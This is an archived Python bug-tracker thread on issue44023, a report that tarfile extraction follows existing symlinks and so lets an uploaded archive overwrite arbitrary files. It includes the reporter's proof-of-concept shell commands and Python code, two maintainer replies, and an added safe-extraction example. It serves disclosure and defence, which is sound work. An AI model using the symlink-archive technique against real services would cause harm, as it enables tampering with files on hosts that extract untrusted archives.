[issue44023] "tarfile" library will lead to "write any content to any file on the host".

2021-05-07 Thread Gregory P. Smith


Gregory P. Smith  added the comment:

TL;DR - A tar file being extracted doesn't check to see if it is overwriting an 
existing file, which could be a symlink to elsewhere leading to elsewhere's 
contents being clobbered assuming the elsewhere file exists.

Doing an unlink before opening the destination file (ignoring either success or 
FileNotFound) during extract would avoid this _specific_ case.

But tarfile is already documented with a warning about untrusted inputs being 
able to do bad things:

https://docs.python.org/3/library/tarfile.html#tarfile.TarFile.extractall

Fixing this one serialized case doesn't do anything about other cases or race 
conditions we won't claim protection against, so I'm not sure this issue is 
serious from a stdlib perspective.

--
nosy: +gregory.p.smith

___
Python tracker 

___
___
Python-bugs-list mailing list
Unsubscribe: 
https://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com
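The mitigation sketched in the comment above, as an added example that is not part of the tracker thread or of CPython's tarfile: instead of unlink-then-open, the destination is opened with exclusive create ("xb", O_CREAT|O_EXCL), which refuses an existing path, symlink included, in the open itself. The helper names (build_tar, safe_extract, demo) and the constructed archive contents are assumptions of this example.

```python
import io
import os
import tarfile
import tempfile

def build_tar(files):
    """Constructed test data: an in-memory uncompressed tar of {name: bytes}."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        for name, data in files.items():
            info = tarfile.TarInfo(name)
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()

def safe_extract(tar_bytes, dest_dir):
    """Extract regular files/dirs only, confined to dest_dir. Files are opened with
    "xb" (O_CREAT|O_EXCL), which fails on any existing path, even a dangling symlink,
    so there is no separate existence check to race. Returns rejected member names."""
    dest_dir = os.path.realpath(dest_dir)
    rejected = []
    with tarfile.open(fileobj=io.BytesIO(tar_bytes), mode="r:") as tar:
        for m in tar.getmembers():
            target = os.path.join(dest_dir, m.name)
            # realpath follows links already on disk, so a planted symlink fails containment.
            inside = os.path.realpath(target).startswith(dest_dir + os.sep)
            if not inside or os.path.islink(target) or not (m.isfile() or m.isdir()):
                rejected.append(m.name)
                continue
            try:
                os.makedirs(target if m.isdir() else os.path.dirname(target), exist_ok=True)
                if m.isfile():
                    with tar.extractfile(m) as src, open(target, "xb") as dst:
                        dst.write(src.read())
            except FileExistsError:
                rejected.append(m.name)
    return rejected

def demo():
    """Replays the report: 'a' is already a link to a victim file when an archive
    holding a regular file 'a' is extracted. Returns (rejected, victim text, clean copy)."""
    with tempfile.TemporaryDirectory() as tmp:
        victim, out, clean = (os.path.join(tmp, n) for n in ("victim.txt", "out", "clean"))
        with open(victim, "w") as f:
            f.write("original")
        os.mkdir(out)
        os.symlink(victim, os.path.join(out, "a"))  # what the first extraction left behind
        payload = build_tar({"a": b"it is just poc"})
        rejected = safe_extract(payload, out)
        safe_extract(payload, clean)  # fresh directory: the same archive extracts normally
        with open(victim) as f, open(os.path.join(clean, "a"), "rb") as g:
            return rejected, f.read(), g.read()
```

Members that are symlinks, hard links or devices are rejected outright, which is stricter than tarfile's own extract; loosen that only for archives whose producer you control.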



[issue44023] "tarfile" library will lead to "write any content to any file on the host".

2021-05-07 Thread Éric Araujo

Éric Araujo  added the comment:

Can you contact the security team (info at https://www.python.org/dev/security/) 
directly?

In general, tarfile (and other Python file functions!) can create files 
anywhere on the filesystem, provided that the process user has the right 
permissions.  But it seems that you’re talking about an unexpected behaviour 
leading to unwanted operations, so please send more details about the problem 
to the team.  Thank you for your report!

--
nosy: +eric.araujo




[issue44023] "tarfile" library will lead to "write any content to any file on the host".

2021-05-03 Thread guangli dong


New submission from guangli dong :

If a file is uncompressed twice into the same dir, an attacker can "write any 
content to any file on the host".

PoC code like below:
```python
import tarfile


dir_name = "/tmp/anything"
# Archive 1 contains a symlink test_tar/a -> /tmp/a, built with:
#   ln -sv /tmp/a test_tar/a; tar -cvf a.tar.gz test_tar/a
file1_name = "/tmp/a.tar.gz"
# Archive 2 contains a regular file test_tar/a holding the payload, built with:
#   echo "it is just poc" > /tmp/payload; rm -rf test_tar; cp /tmp/payload test_tar/a; tar -cvf b.tar.gz test_tar/a
file2_name = "/tmp/b.tar.gz"


def vuln_tar(tar_path):
    """
    Extract every member of tar_path into dir_name, one at a time.
    :param tar_path: path of the (uncompressed) tar archive to extract
    :return: None
    """
    tar = tarfile.open(tar_path, "r:tar")
    file_names = tar.getnames()
    for file_name in file_names:
        # extract() opens the destination path for writing; if that path is
        # already a symlink from a previous extraction, the link is followed.
        tar.extract(file_name, dir_name)
    tar.close()


vuln_tar(file1_name)
vuln_tar(file2_name)
```

In this PoC code, if a service uncompresses a tar file uploaded by the attacker 
into "dir_name" twice, the attacker can create "/tmp/a" and write the "it is 
just poc" string into the "/tmp/a" file.

--
components: Library (Lib)
files: poc.tar.gz
messages: 392827
nosy: leveryd
priority: normal
severity: normal
status: open
title: "tarfile" library will lead to "write any content to any file on the host".
type: security
versions: Python 3.7
Added file: https://bugs.python.org/file50005/poc.tar.gz
